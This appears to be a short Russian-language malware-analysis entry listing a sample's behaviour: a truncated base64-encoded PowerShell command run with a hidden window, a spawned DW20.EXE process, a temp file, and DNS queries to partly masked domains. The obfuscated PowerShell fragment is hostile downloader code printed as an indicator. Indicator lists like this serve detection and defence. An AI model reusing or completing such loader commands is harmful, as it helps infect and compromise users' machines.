Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXADcAYQBpAGwAYgBxAD0AKAAoACcAQgAnACsAJwBoADYAJwApACsAKAAnAGQAeQAnACsAJwA5ACcAKQArACcAYQAnACkAOwAuACgAJwBuAGUAdwAtACcAKwAnAGkAdAAnACsAJwBlAG0AJwApACAAJABFAE4AdgA6AHQARQBNAFAAXAB3AG8AUgBkAF...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1400
- %TEMP%\839971.cvr
- 'gn##ur.com':443
- 'gn##ur.com':443
- DNS ASK al###zsons.com
- DNS ASK le#####nesboldogan.com
- DNS ASK me####4newss.com
- DNS ASK 7a####lfallah.com
- DNS ASK gn##ur.com
- DNS ASK ma#####ta.lequss.com
- DNS ASK ad#####eboutique.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXADcAYQBpAGwAYgBxAD0AKAAoACcAQgAnACsAJwBoADYAJwApACsAKAAnAGQAeQAnACsAJwA5ACcAKQArACcAYQAnACkAOwAuACgAJwBuAGUAdwAtACcAKwAnAGkAdAAnACsAJwBlAG0AJwApACAAJABFAE4AdgA6AHQARQBNAFAAXAB3AG8AUgBkAF...' (со скрытым окном)